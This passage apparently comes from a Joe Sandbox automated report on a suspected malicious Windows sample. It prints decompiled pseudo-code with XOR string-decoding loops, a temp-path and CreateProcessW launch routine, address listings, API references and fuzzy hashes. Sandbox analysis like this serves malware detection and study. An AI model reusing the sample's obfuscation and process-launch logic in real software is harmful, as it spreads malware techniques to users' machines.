									asm("psrld xmm1, xmm6");
									asm("pmulld xmm1, xmm5");
									asm("psubd xmm2, xmm1");
									asm("pshuflw xmm0, xmm2, 0xd8");
									asm("pshufhw xmm0, xmm0, 0xd8");
									asm("pshufd xmm1, xmm0, 0xd8");
									asm("pand xmm1, [0x415b40]");
									asm("packuswb xmm1, xmm1");
									asm("movd xmm0, ecx");
									asm("paddb xmm1, xmm0");
									asm("movd xmm0, dword [ebp+eax-0xa58]");
									asm("pxor xmm1, xmm0");
									asm("movd [ebp+eax-0xa58], xmm1");
									_t746 = _t746 + 8;
								} while (_t746 < 0x1c);
								_v2544 = _t985;
								if(_t985 >= 0x1c) {
									goto L37;
								}
								goto L36;
							}
							_t989 = 0;
							_v2544 = 0;
							if(_t1014 < 2) {
								do {
									L30:
									_t992 = _v2544;
									 *(_t1033 + _t992 - 0xa08) =  *(_t1033 + _t992 - 0xa08) ^ _t992 - (0xa0a0a0a1 * _t989 >> 0x00000020 >> 0x00000005) * 0x00000033 + 0x00000031;
									_t989 = _t992 + 1;
									_v2544 = _t989;
								} while (_t989 < 0x14);
								goto L31;
							}
							asm("movaps xmm0, [0x415b50]");
							_t127 = _t989 + 4; // 0x4
							_t751 = _t127;
							asm("movaps xmm4, [0x415af0]");
							asm("movaps xmm3, [0x415b60]");
							asm("movaps xmm5, [0x415b20]");
							asm("movaps [ebp-0x280], xmm0");
							asm("movd xmm6, edi");
							do {
								asm("movd xmm0, edx");
								_t989 = _t989 + 8;
								asm("pshufd xmm2, xmm0, 0x0");
								asm("paddd xmm2, xmm4");
								asm("movaps xmm1, xmm2");
								asm("movaps xmm0, xmm2");
								asm("punpckldq xmm1, xmm2");
								asm("pmuludq xmm1, xmm3");
								asm("punpckhdq xmm0, xmm2");
								asm("pmuludq xmm0, xmm3");
								asm("shufps xmm1, xmm0, 0xdd");
								asm("psrld xmm1, xmm6");
								asm("pmulld xmm1, xmm5");
								asm("psubd xmm2, xmm1");
								asm("pshuflw xmm0, xmm2, 0xd8");
								asm("pshufhw xmm0, xmm0, 0xd8");
								asm("pshufd xmm1, xmm0, 0xd8");
								asm("pand xmm1, [0x415b40]");
								asm("packuswb xmm1, xmm1");
								asm("movd xmm0, ecx");
								asm("paddb xmm1, xmm0");
								asm("movd xmm0, dword [ebp+eax-0xa0c]");
								asm("pxor xmm1, xmm0");
								asm("movd xmm0, eax");
								asm("movd [ebp+eax-0xa0c], xmm1");
								asm("pshufd xmm2, xmm0, 0x0");
								asm("paddd xmm2, xmm4");
								asm("movaps xmm1, xmm2");
								asm("movaps xmm0, xmm2");
								asm("punpckldq xmm1, xmm2");
								asm("pmuludq xmm1, xmm3");
								asm("punpckhdq xmm0, xmm2");
								asm("pmuludq xmm0, xmm3");
								asm("shufps xmm1, xmm0, 0xdd");
								asm("psrld xmm1, xmm6");
								asm("pmulld xmm1, xmm5");
								asm("psubd xmm2, xmm1");
								asm("pshuflw xmm0, xmm2, 0xd8");
								asm("pshufhw xmm0, xmm0, 0xd8");
								asm("pshufd xmm1, xmm0, 0xd8");
								asm("pand xmm1, [0x415b40]");
								asm("packuswb xmm1, xmm1");
								asm("movd xmm0, ecx");
								asm("paddb xmm1, xmm0");
								asm("movd xmm0, dword [ebp+eax-0xa08]");
								asm("pxor xmm1, xmm0");
								asm("movd [ebp+eax-0xa08], xmm1");
								_t751 = _t751 + 8;
							} while (_t751 < 0x14);
							_v2544 = _t989;
							if(_t989 >= 0x14) {
								goto L31;
							}
							goto L30;
						}
						_t993 = 0;
						_v2544 = 0;
						if(_t1014 < 2) {
							do {
								L24:
								_t996 = _v2544;
								 *(_t1033 + _t996 - 0xa3c) =  *(_t1033 + _t996 - 0xa3c) ^ _t996 - (0xa0a0a0a1 * _t993 >> 0x00000020 >> 0x00000005) * 0x00000033 + 0x00000031;
								_t993 = _t996 + 1;
								_v2544 = _t993;
							} while (_t993 < 0x10);
							goto L25;
						}
						asm("movaps xmm0, [0x415b50]");
						_t110 = _t993 + 4; // 0x4
						_t756 = _t110;
						asm("movaps xmm4, [0x415af0]");
						asm("movaps xmm3, [0x415b60]");
						asm("movaps xmm5, [0x415b20]");
						asm("movaps [ebp-0x280], xmm0");
						asm("movd xmm6, edi");
						asm("o16 nop [eax+eax]");
						do {
							asm("movd xmm0, edx");
							_t993 = _t993 + 8;
							asm("pshufd xmm2, xmm0, 0x0");
							asm("paddd xmm2, xmm4");
							asm("movaps xmm1, xmm2");
							asm("movaps xmm0, xmm2");
							asm("punpckldq xmm1, xmm2");
							asm("pmuludq xmm1, xmm3");
							asm("punpckhdq xmm0, xmm2");
							asm("pmuludq xmm0, xmm3");
							asm("shufps xmm1, xmm0, 0xdd");
							asm("psrld xmm1, xmm6");
							asm("pmulld xmm1, xmm5");
							asm("psubd xmm2, xmm1");
							asm("pshuflw xmm0, xmm2, 0xd8");
							asm("pshufhw xmm0, xmm0, 0xd8");
							asm("pshufd xmm1, xmm0, 0xd8");
							asm("pand xmm1, [0x415b40]");
							asm("packuswb xmm1, xmm1");
							asm("movd xmm0, ecx");
							asm("paddb xmm1, xmm0");
							asm("movd xmm0, dword [ebp+eax-0xa40]");
							asm("pxor xmm1, xmm0");
							asm("movd xmm0, eax");
							asm("movd [ebp+eax-0xa40], xmm1");
							asm("pshufd xmm2, xmm0, 0x0");
							asm("paddd xmm2, xmm4");
							asm("movaps xmm1, xmm2");
							asm("movaps xmm0, xmm2");
							asm("punpckldq xmm1, xmm2");
							asm("pmuludq xmm1, xmm3");
							asm("punpckhdq xmm0, xmm2");
							asm("pmuludq xmm0, xmm3");
							asm("shufps xmm1, xmm0, 0xdd");
							asm("psrld xmm1, xmm6");
							asm("pmulld xmm1, xmm5");
							asm("psubd xmm2, xmm1");
							asm("pshuflw xmm0, xmm2, 0xd8");
							asm("pshufhw xmm0, xmm0, 0xd8");
							asm("pshufd xmm1, xmm0, 0xd8");
							asm("pand xmm1, [0x415b40]");
							asm("packuswb xmm1, xmm1");
							asm("movd xmm0, ecx");
							asm("paddb xmm1, xmm0");
							asm("movd xmm0, dword [ebp+eax-0xa3c]");
							asm("pxor xmm1, xmm0");
							asm("movd [ebp+eax-0xa3c], xmm1");
							_t756 = _t756 + 8;
						} while (_t756 < 0x14);
						_v2544 = _t993;
						if(_t993 >= 0x10) {
							goto L25;
						}
						goto L24;
					} else {
						_t997 = 0;
						_v2548 = 0;
						if(_t1014 >= 2) {
							asm("movaps xmm2, [0x415af0]");
							_t997 = 8;
							asm("movaps xmm4, [0x415b60]");
							asm("movaps xmm1, xmm2");
							asm("punpckldq xmm1, xmm2");
							asm("movaps xmm0, xmm2");
							asm("pmuludq xmm1, xmm4");
							asm("punpckhdq xmm0, xmm2");
							asm("pmuludq xmm0, xmm4");
							asm("movd xmm3, edi");
							_v2548 = 8;
							asm("shufps xmm1, xmm0, 0xdd");
							asm("psrld xmm1, xmm3");
							asm("pmulld xmm1, [0x415b20]");
							asm("psubd xmm2, xmm1");
							asm("pshuflw xmm0, xmm2, 0xd8");
							asm("movaps xmm2, [0x415b10]");
							asm("pshufhw xmm0, xmm0, 0xd8");
							asm("pshufd xmm1, xmm0, 0xd8");
							asm("pand xmm1, [0x415b40]");
							asm("movd xmm0, dword [0x415ae0]");
							asm("packuswb xmm1, xmm1");
							asm("paddb xmm1, [0x415b50]");
							asm("pxor xmm1, xmm0");
							asm("movaps xmm0, xmm2");
							asm("movd [ebp-0xa2c], xmm1");
							asm("movaps xmm1, xmm2");
							asm("punpckldq xmm1, xmm2");
							asm("pmuludq xmm1, xmm4");
							asm("punpckhdq xmm0, xmm2");
							asm("pmuludq xmm0, xmm4");
							asm("shufps xmm1, xmm0, 0xdd");
							asm("psrld xmm1, xmm3");
							asm("pmulld xmm1, [0x415b20]");
							asm("psubd xmm2, xmm1");
							asm("pshuflw xmm0, xmm2, 0xd8");
							asm("pshufhw xmm0, xmm0, 0xd8");
							asm("pshufd xmm1, xmm0, 0xd8");
							asm("pand xmm1, [0x415b40]");
							asm("movd xmm0, dword [ebp-0xa28]");
							asm("packuswb xmm1, xmm1");
							asm("paddb xmm1, [0x415b50]");
							asm("pxor xmm1, xmm0");
							asm("movd [ebp-0xa28], xmm1");
						}
						do {
							_t1000 = _v2548;
							 *(_t1033 + _t1000 - 0xa2c) =  *(_t1033 + _t1000 - 0xa2c) ^ _t1000 - (0xa0a0a0a1 * _t997 >> 0x00000020 >> 0x00000005) * 0x00000033 + 0x00000031;
							_t997 = _t1000 + 1;
							_v2548 = _t997;
						} while (_t997 < 0xc);
						goto L13;
					}
				} else {
					_t898 =  &_v556;
					_t1001 = _t898 + 2;
					goto L2;
					L2:
					_t762 =  *_t898;
					_t898 = _t898 + 2;
					if(_t762 != 0) {
						goto L2;
					} else {
						E0040D040(_t765,  &_v772, _t1002, _t1013,  &_v556, _t898 - _t1001 >> 1);
						goto L5;
					}
				}
			}

0x00406dc1
0x00406dc9
0x00406dd0
0x00406dd4
0x00406dd6
0x00406dd8
0x00406de3
0x00406de4
0x00406de5
0x00406deb
0x00406df0
0x00406df2
0x00406df5
0x00406df6
0x00406df7
0x00406dfb
0x00406e03
0x00406e09
0x00406e0f
0x00406e12
0x00406e18
0x00406e1e
0x00406e28
0x00406e35
0x00406e47
0x00406e7d
0x00406e82
0x00406e85
0x00406e85
0x00406e90
0x00406e92
0x00406e93
0x00406e98
0x00406e9e
0x00406ea1
0x00406ea8
0x00406eaa
0x00406eaf
0x00406eb5
0x00406eb7
0x00406ec0
0x00406ecd
0x00406edd
0x00406ee4
0x00406ee5
0x00406eeb
0x00406ef6
0x00406ef7
0x00406f00
0x00406f0b
0x00406f10
0x00406f1a
0x00406f25
0x00406f2e
0x00406f33
0x00406f33
0x00406f42
0x00406f4a
0x00406f4f
0x00406f55
0x00406f5d
0x00406f63
0x00407092
0x00407092
0x00407097
0x00407099
0x0040709f
0x004070a4
0x004070aa
0x004070b0
0x004070bd
0x004070cd
0x004070d4
0x004070d5
0x004070db
0x004070eb
0x004070fa
0x00407100
0x00407105
0x00407110
0x00407115
0x0040711b
0x0040711d
0x00407124
0x00407129
0x0040712f
0x00407135
0x00407142
0x00407152
0x00407159
0x0040715a
0x00407160
0x00407165
0x0040716a
0x0040716c
0x00407172
0x00407178
0x0040717f
0x00407184
0x0040718a
0x00407190
0x0040719d
0x004071ad
0x004071b4
0x004071b5
0x004071bb
0x004071cc
0x004071db
0x004071e1
0x004071e6
0x004071f1
0x004071f6
0x004071fd
0x00407204
0x00407209
0x0040720f
0x00407384
0x00407390
0x0040739c
0x004073a3
0x004073a8
0x004073ae
0x004073b5
0x00407524
0x00407530
0x0040753c
0x00407543
0x00407548
0x0040754e
0x00407555
0x0040755d
0x00407565
0x004076d4
0x004076e0
0x004076e5
0x004076ef
0x004076f9
0x00407703
0x00407710
0x0040771a
0x0040772c
0x00407732
0x0040773c
0x00407746
0x00407750
0x00407757
0x0040776e
0x00407784
0x0040778f
0x0040779d
0x0040786c
0x0040786c
0x00407873
0x00407873
0x0040787b
0x004078c0
0x004078c7
0x004078d0
0x004078d5
0x004078d5
0x004078e2
0x004078eb
0x004078f0
0x004078f0
0x004078f3
0x004078fd
0x00407907
0x00407911
0x00407918
0x00407920
0x00407933
0x0040793c
0x00407949
0x0040794e
0x00407954
0x00407961
0x00000000
0x00000000
0x00407967
0x0040796d
0x00407976
0x004079b0
0x004079b0
0x004079b6
0x004079c0
0x004079c0
0x004079c2
0x004079c3
0x004079c7
0x004079dc
0x004079e1
0x00000000
0x00000000
0x004079e7
0x004079ed
0x004079f0
0x00407a03
0x00407a06
0x00407a3c
0x00407a3c
0x00407a3e
0x00407a40
0x00000000
0x00000000
0x00000000
0x00407a40
0x00407a08
0x00407a08
0x00407a0c
0x00407a35
0x00407a35
0x00407a37
0x00000000
0x00407a37
0x00407a11
0x00000000
0x00000000
0x00407a13
0x00407a19
0x00000000
0x00000000
0x00407a1e
0x00000000
0x00000000
0x00407a20
0x00407a26
0x00000000
0x00000000
0x00407a2b
0x00000000
0x00000000
0x00407a2d
0x00407a33
0x00000000
0x00000000
0x00000000
0x00407a33
0x004079f2
0x004079f8
0x004079fb
0x004079fe
0x00407a01
0x00000000
0x00000000
0x00000000
0x00407a01
0x00000000
0x004079f2
0x00407978
0x0040797a
0x00407980
0x0040798d
0x0040799d
0x004079a4
0x004079a5
0x004079ab
0x00000000
0x00407980
0x00407a54
0x00407a59
0x00407a62
0x00407a6d
0x00407a78
0x00407a8b
0x00407a9c
0x00407a9f
0x00407aa8
0x00407ab9
0x00407abc
0x00407abf
0x00407acc
0x00407ad7
0x00407ae3
0x00407ae9
0x00407aed
0x00407af6
0x00407b1f
0x00407b1f
0x00407b23
0x00407b2c
0x00407b59
0x00407b59
0x00407b5d
0x00407b66
0x00407b99
0x00407b9f
0x00407bab
0x00407bb6
0x00407bbc
0x00407bc8
0x00407bd3
0x00407c64
0x00407c66
0x00407c69
0x00407c76
0x00407c7c
0x00407c7e
0x00407bd9
0x00407be5
0x00407bec
0x00407bf8
0x00407c1a
0x00407c04
0x00407c0a
0x00407c12
0x00407c0c
0x00407c0c
0x00407c0c
0x00407c0a
0x00407c1f
0x00407c28
0x00407c29
0x00407c2a
0x00407c2f
0x00407c30
0x00407c35
0x00407c36
0x00407c45
0x00407c46
0x00407c4d
0x00407c4e
0x00407c53
0x00407c59
0x00407c5f
0x00407c5f
0x00407c83
0x00407c90
0x00407c9a
0x00407ca4
0x00407ca7
0x00407cad
0x00407cb4
0x00407cb9
0x00407cc1
0x00407cc8
0x00407ccf
0x00407cd2
0x00407cd6
0x00407cdf
0x00407ce1
0x00407ce7
0x00407ce8
0x00407cf0
0x00407cf2
0x00407cf5
0x00407d00
0x00407d02
0x00407d02
0x00407d00
0x00407d08
0x00407d0a
0x00407d0f
0x00407d0f
0x00407d1f
0x00407d25
0x00407d2f
0x00407d39
0x00407d40
0x00407d4c
0x00407d4e
0x00407d42
0x00407d42
0x00407d48
0x00407d48
0x00407d56
0x00407d60
0x00407d6f
0x00407d7b
0x00407d86
0x00407d91
0x00407d97
0x00407d9d
0x00407dfe
0x00407dfe
0x00407e0d
0x00407e1c
0x00407e26
0x00407e26
0x00407e2a
0x00407e34
0x00407e41
0x00407e46
0x00407e48
0x00407e55
0x00407f56
0x00407f56
0x00407f6a
0x00407f72
0x00407f73
0x00407f78
0x00407f7a
0x00407f84
0x00407f8a
0x00407f94
0x00407f9e
0x00407fa1
0x00407fb0
0x00407fb0
0x00407fb3
0x00407fb6
0x00407fcd
0x00407fd4
0x00407fd8
0x00407fe0
0x00407fea
0x00407ff0
0x00407ffb
0x00408007
0x0040800c
0x00408012
0x00408020
0x00408020
0x0040803c
0x00408042
0x0040804b
0x00408051
0x00408079
0x0040807a
0x00408081
0x00408087
0x0040808e
0x00408053
0x00408053
0x00408059
0x00408065
0x0040806c
0x00408072
0x00408072
0x00408093
0x00408099
0x00408099
0x0040809e
0x004080a9
0x004080e2
0x004080f5
0x004080fc
0x00408106
0x0040810b
0x0040810e
0x00408112
0x0040811b
0x0040814e
0x00408150
0x0040815a
0x00408164
0x0040816b
0x0040816f
0x00408178
0x004081b1
0x004081b3
0x004081c3
0x004081d1
0x004081db
0x004081f3
0x004081fb
0x00408212
0x00408216
0x00408222
0x00408229
0x0040823f
0x0040823f
0x00408245
0x0040824d
0x0040824f
0x00408250
0x00408257
0x00408261
0x00408264
0x00408277
0x0040827a
0x00408281
0x00408288
0x0040828a
0x00408290
0x00408297
0x004082a1
0x004082a8
0x004082a8
0x004082b0
0x004082b0
0x004082b3
0x004082b6
0x004082b6
0x004082c7
0x004082cc
0x004082e8
0x00408300
0x00408307
0x00408313
0x0040831a
0x00408325
0x00408326
0x00408327
0x00408328
0x00408333
0x00408338
0x00408350
0x0040836f
0x00408375
0x0040837e
0x00408380
0x00408386
0x0040838d
0x00408395
0x00408397
0x0040839a
0x004083a5
0x004083a7
0x004083a7
0x004083a5
0x004083ad
0x004083af
0x004083b4
0x004083b4
0x004083bd
0x004083c2
0x004083cb
0x00408402
0x00408402
0x0040840a
0x00408414
0x0040841e
0x00408428
0x0040845f
0x0040845f
0x00408465
0x00408467
0x00408471
0x0040847b
0x00408485
0x004084b6
0x004084b6
0x004084bc
0x004084c6
0x004084d0
0x004084da
0x0040850d
0x0040850d
0x00408513
0x0040853d
0x0040853d
0x00408540
0x00408547
0x0040854e
0x00408555
0x00000000
0x00000000
0x00408557
0x0040855a
0x0040855b
0x00408563
0x00000000
0x00000000
0x00408565
0x00408568
0x00408573
0x00000000
0x00000000
0x00000000
0x00408573
0x00408515
0x00408518
0x00408519
0x00408521
0x00408533
0x00408533
0x00408535
0x0040853a
0x00000000
0x0040853a
0x00408523
0x00408526
0x0040852b
0x00408531
0x00000000
0x00000000
0x00000000
0x00408531
0x004084dc
0x004084e2
0x004084e9
0x004084f1
0x00408503
0x00408503
0x00408505
0x0040850a
0x00000000
0x0040850a
0x004084f3
0x004084f6
0x004084fb
0x00408501
0x00000000
0x00000000
0x00000000
0x00408501
0x00408487
0x0040848d
0x0040848e
0x00408496
0x004084ac
0x004084ac
0x004084ae
0x004084b3
0x00000000
0x004084b3
0x00408498
0x0040849b
0x004084a0
0x004084a6
0x00000000
0x00000000
0x00000000
0x004084a6
0x0040842a
0x00408430
0x00408437
0x0040843f
0x00408455
0x00408455
0x00408457
0x0040845c
0x00000000
0x0040845c
0x00408441
0x00408444
0x00408449
0x0040844f
0x00000000
0x00000000
0x00000000
0x004083cd
0x004083cd
0x004083d3
0x004083da
0x004083e2
0x004083f8
0x004083f8
0x004083fa
0x004083ff
0x00000000
0x004083ff
0x004083e4
0x004083e7
0x004083ec
0x004083f2
0x00408575
0x00408575
0x0040857b
0x0040857b
0x0040857d
0x00408585
0x00408588
0x00408590
0x00408591
0x004085a2
0x004085a2
0x00000000
0x004083f2
0x004083cb
0x0040817a
0x00408180
0x00408187
0x0040818f
0x004081a7
0x004081a7
0x004081a9
0x004081ae
0x00000000
0x004081ae
0x00408191
0x00408194
0x0040819f
0x00000000
0x00000000
0x004081a1
0x004081a1
0x00000000
0x004081a1
0x0040811d
0x00408123
0x0040812a
0x00408132
0x00408144
0x00408144
0x00408146
0x0040814b
0x00000000
0x0040814b
0x00408134
0x00408137
0x0040813c
0x00408142
0x00000000
0x00000000
0x00000000
0x00408142
0x004080b1
0x004080b3
0x004080ba
0x004080c2
0x004080d8
0x004080d8
0x004080da
0x004080df
0x00000000
0x004080df
0x004080c4
0x004080c7
0x004080cc
0x004080d2
0x00000000
0x00000000
0x00000000
0x004080d2
0x00407e5b
0x00407e67
0x00407e6e
0x00407e75
0x00407e7c
0x00407e80
0x00407e80
0x00407e87
0x00407e8c
0x00407e90
0x00407e93
0x00407e96
0x00407e9a
0x00407e9e
0x00407ea2
0x00407ea6
0x00407eaa
0x00407eae
0x00407eb3
0x00407eb7
0x00407ebc
0x00407ec1
0x00407ec6
0x00407eca
0x00407ece
0x00407ed7
0x00407edb
0x00407edf
0x00407ee8
0x00407eed
0x00407ef1
0x00407ef4
0x00407ef7
0x00407efb
0x00407eff
0x00407f03
0x00407f07
0x00407f0b
0x00407f0f
0x00407f14
0x00407f18
0x00407f1d
0x00407f22
0x00407f27
0x00407f2b
0x00407f2f
0x00407f38
0x00407f3c
0x00407f45
0x00407f48
0x00407f54
0x00000000
0x00000000
0x00000000
0x00407da0
0x00407da0
0x00407da4
0x00407daa
0x00407db3
0x00407ddf
0x00407de0
0x00407de7
0x00407ded
0x00407df4
0x00407db5
0x00407dbc
0x00407dbf
0x00407dcb
0x00407dd2
0x00407dd8
0x00407dd8
0x00407df9
0x00407dfa
0x00000000
0x00407da0
0x00407d9d
0x00407b68
0x00407b6e
0x00407b6f
0x00407b77
0x00407b8f
0x00407b8f
0x00407b91
0x00407b96
0x00000000
0x00407b96
0x00407b79
0x00407b7c
0x00407b87
0x00000000
0x00000000
0x00407b89
0x00407b89
0x00000000
0x00407b89
0x00407b2e
0x00407b34
0x00407b35
0x00407b3d
0x00407b4f
0x00407b4f
0x00407b51
0x00407b56
0x00000000
0x00407b56
0x00407b3f
0x00407b42
0x00407b47
0x00407b4d
0x00000000
0x00000000
0x00000000
0x00407b4d
0x00407af8
0x00407af8
0x00407afb
0x00407b03
0x00407b15
0x00407b15
0x00407b17
0x00407b1c
0x00000000
0x00407b1c
0x00407b05
0x00407b08
0x00407b0d
0x00407b13
0x00000000
0x00000000
0x00000000
0x00407b13
0x0040787d
0x00407886
0x0040788f
0x00000000
0x00000000
0x00407891
0x00407897
0x00407898
0x004078a0
0x004078b6
0x004078b6
0x004078b8
0x004078bd
0x00000000
0x004078bd
0x004078a2
0x004078a5
0x004078aa
0x004078b0
0x00000000
0x00000000
0x00000000
0x004078b0
0x004077a5
0x004077bb
0x004077c5
0x004077d3
0x004077d4
0x004077e2
0x004077ec
0x004077f1
0x004077f6
0x004077fc
0x00407802
0x0040780c
0x00407815
0x00407850
0x0040785c
0x00407861
0x0040786a
0x00000000
0x00000000
0x00000000
0x0040786a
0x00407817
0x00407819
0x00407820
0x0040782d
0x0040783d
0x00407844
0x00407845
0x0040784b
0x00000000
0x00407820
0x0040756b
0x0040756d
0x00407576
0x004076a4
0x004076a4
0x004076b1
0x004076c1
0x004076c8
0x004076c9
0x004076cf
0x00000000
0x004076a4
0x0040757c
0x00407583
0x00407583
0x00407586
0x0040758d
0x00407594
0x0040759b
0x004075a8
0x004075b0
0x004075b0
0x004075b4
0x004075b7
0x004075bc
0x004075c0
0x004075c3
0x004075c6
0x004075ca
0x004075ce
0x004075d2
0x004075d6
0x004075da
0x004075de
0x004075e3
0x004075e7
0x004075ec
0x004075f1
0x004075f6
0x004075fe
0x00407602
0x00407606
0x0040760a
0x00407613
0x00407617
0x0040761b
0x00407624
0x00407629
0x0040762d
0x00407630
0x00407633
0x00407637
0x0040763b
0x0040763f
0x00407643
0x00407647
0x0040764b
0x00407650
0x00407654
0x00407659
0x0040765e
0x00407663
0x0040766b
0x0040766f
0x00407673
0x00407677
0x00407680
0x00407684
0x0040768d
0x00407690
0x00407699
0x004076a2
0x00000000
0x00000000
0x00000000
0x004076a2
0x004073bb
0x004073bd
0x004073c6
0x004074f4
0x004074f4
0x00407501
0x00407511
0x00407518
0x00407519
0x0040751f
0x00000000
0x004074f4
0x004073cc
0x004073d3
0x004073d3
0x004073d6
0x004073dd
0x004073e4
0x004073eb
0x004073f8
0x00407400
0x00407400
0x00407404
0x00407407
0x0040740c
0x00407410
0x00407413
0x00407416
0x0040741a
0x0040741e
0x00407422
0x00407426
0x0040742a
0x0040742e
0x00407433
0x00407437
0x0040743c
0x00407441
0x00407446
0x0040744e
0x00407452
0x00407456
0x0040745a
0x00407463
0x00407467
0x0040746b
0x00407474
0x00407479
0x0040747d
0x00407480
0x00407483
0x00407487
0x0040748b
0x0040748f
0x00407493
0x00407497
0x0040749b
0x004074a0
0x004074a4
0x004074a9
0x004074ae
0x004074b3
0x004074bb
0x004074bf
0x004074c3
0x004074c7
0x004074d0
0x004074d4
0x004074dd
0x004074e0
0x004074e9
0x004074f2
0x00000000
0x00000000
0x00000000
0x004074f2
0x00407215
0x00407217
0x00407220
0x00407354
0x00407354
0x00407361
0x00407371
0x00407378
0x00407379
0x0040737f
0x00000000
0x00407354
0x00407226
0x0040722d
0x0040722d
0x00407230
0x00407237
0x0040723e
0x00407245
0x00407252
0x00407256
0x00407260
0x00407260
0x00407264
0x00407267
0x0040726c
0x00407270
0x00407273
0x00407276
0x0040727a
0x0040727e
0x00407282
0x00407286
0x0040728a
0x0040728e
0x00407293
0x00407297
0x0040729c
0x004072a1
0x004072a6
0x004072ae
0x004072b2
0x004072b6
0x004072ba
0x004072c3
0x004072c7
0x004072cb
0x004072d4
0x004072d9
0x004072dd
0x004072e0
0x004072e3
0x004072e7
0x004072eb
0x004072ef
0x004072f3
0x004072f7
0x004072fb
0x00407300
0x00407304
0x00407309
0x0040730e
0x00407313
0x0040731b
0x0040731f
0x00407323
0x00407327
0x00407330
0x00407334
0x0040733d
0x00407340
0x00407349
0x00407352
0x00000000
0x00000000
0x00000000
0x00406f69
0x00406f69
0x00406f6b
0x00406f74
0x00406f7a
0x00406f81
0x00406f86
0x00406f8d
0x00406f90
0x00406f94
0x00406f97
0x00406f9b
0x00406f9f
0x00406fa3
0x00406fa7
0x00406fad
0x00406fb1
0x00406fb5
0x00406fbe
0x00406fc2
0x00406fc7
0x00406fce
0x00406fd3
0x00406fd8
0x00406fe0
0x00406fe8
0x00406fec
0x00406ff4
0x00406ff8
0x00406ffb
0x00407003
0x00407006
0x0040700a
0x0040700e
0x00407012
0x00407016
0x0040701a
0x0040701e
0x00407027
0x0040702b
0x00407030
0x00407035
0x0040703a
0x00407042
0x0040704a
0x0040704e
0x00407056
0x0040705a
0x0040705a
0x00407062
0x0040706f
0x0040707f
0x00407086
0x00407087
0x0040708d
0x00000000
0x00407062
0x00406e49
0x00406e49
0x00406e4f
0x00406e4f
0x00406e52
0x00406e52
0x00406e55
0x00406e5b
0x00000000
0x00406e5d
0x00406e6f
0x00000000
0x00406e6f
0x00406e5b

APIs

GetTempPathW.KERNEL32(00000104,?,149E0ABF), ref: 00406E3F
_printf.MSPDB140-MSVCRT ref: 00406E7D
_printf.MSPDB140-MSVCRT ref: 00406F2E
_printf.MSPDB140-MSVCRT ref: 004078D0
_printf.MSPDB140-MSVCRT ref: 004078EB
CreateProcessW.KERNEL32 ref: 0040836F

Strings

71<, xrefs: 00406F4A
<83, xrefs: 00407115
Error: %d, xrefs: 00406E78, 00406F29, 004078CB, 004078E6

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: _printf$CreatePathProcessTemp
String ID: 71<$<83$Error: %d
API String ID: 1077525697-305793445
Opcode ID: 37f9a11ae50d150f1825f60f27af16b71b0eb3180e2fddd77cd2dc2db7dbbaf6
Instruction ID: 8c5eca27be0589e18126c59818da685de34cdd86b8967f910ef9a101e7308f81
Opcode Fuzzy Hash: 37f9a11ae50d150f1825f60f27af16b71b0eb3180e2fddd77cd2dc2db7dbbaf6
Instruction Fuzzy Hash: DBD2F271D112598AEB16CB38CC457DDB774AF96344F10C3EAE408B66A2EB346AC5CF48

Uniqueness

Uniqueness Score: -1.00%

Function 004133F6 Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E004133F6(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t36;
				char* _t38;
				long _t47;
				intOrPtr _t49;
				void* _t52;
				intOrPtr _t53;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr* _t58;

				_t57 = __esi;
				_t56 = __edi;
				_t55 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t53 = _a4;
					asm("int 0x29");
				}
				_push(3);
				E004135BE(_t34);
				 *_t58 = 0x2cc;
				_t36 =  &_v808;
				_push(0);
				_push(_t36);
				L004139BD();
				_v632 = _t36;
				_v636 = _t53;
				_v640 = _t55;
				_v644 = _t49;
				_v648 = _t57;
				_v652 = _t56;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t38 =  &_v0;
				_v612 = _t38;
				_v808 = 0x10001;
				_push(0x50);
				_v628 =  *((intOrPtr*)(_t38 - 4));
				_push(0);
				_push( &_v92);
				L004139BD();
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t52 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t47 = UnhandledExceptionFilter( &_v12);
				if(_t47 == 0 && _t52 == 0) {
					_push(3);
					return E004135BE(_t47);
				}
				return _t47;
			}

0x004133f6
0x004133f6
0x004133f6
0x0041340a
0x0041340c
0x0041340f
0x0041340f
0x00413411
0x00413413
0x00413418
0x0041341f
0x00413425
0x00413427
0x00413428
0x00413430
0x00413436
0x0041343c
0x00413442
0x00413448
0x0041344e
0x00413454
0x0041345b
0x00413462
0x00413469
0x00413470
0x00413477
0x0041347e
0x0041347f
0x00413488
0x0041348e
0x00413491
0x00413497
0x004134a4
0x004134a6
0x004134af
0x004134b1
0x004134b2
0x004134bd
0x004134c4
0x004134cb
0x004134d6
0x004134de
0x004134e7
0x004134e9
0x004134ec
0x004134ee
0x004134f8
0x00413500
0x00413506
0x00000000
0x0041350d
0x00413510

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00413402
IsDebuggerPresent.KERNEL32 ref: 004134CE
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004134EE
UnhandledExceptionFilter.KERNEL32(?), ref: 004134F8

Memory Dump Source

